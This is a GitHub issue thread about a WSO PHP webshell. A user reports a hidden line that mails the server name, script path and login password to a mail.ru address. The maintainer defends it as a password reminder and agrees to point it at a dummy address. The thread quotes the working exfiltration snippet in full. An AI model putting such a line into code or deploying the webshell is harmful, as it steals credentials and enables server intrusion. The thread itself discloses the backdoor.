### ISSUE TITLE
backdoor-ed webshell

### ISSUE THREAD

**Issue by sandman4812av** [mIcHyAmRaNe/wso-webshell#3]
#4 Line   $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('shadowhacker-287@mail.ru', 'root', $tmp); // Edit or delete!
}

**Comment by mIcHyAmRaNe** [comment]
you can edit the the password, and the email to your personal values. 
the original email address was hard_linux@mail.ru and as i don't know who is its owner and what he do with the collected data i preferred to use another address that i created. 

and for info, I don't consult it, and it does not interest me.

I did not delete it because it is a good function that can allow the user to remember its access if he forgot the site name or password

**Comment by sandman4812av** [comment]
so, and you could change that email to test@test.com address ;)

**Comment by mIcHyAmRaNe** [comment]
how didn't it go through my mind?! :( 
I should have thought about it

thank you for your suggestion
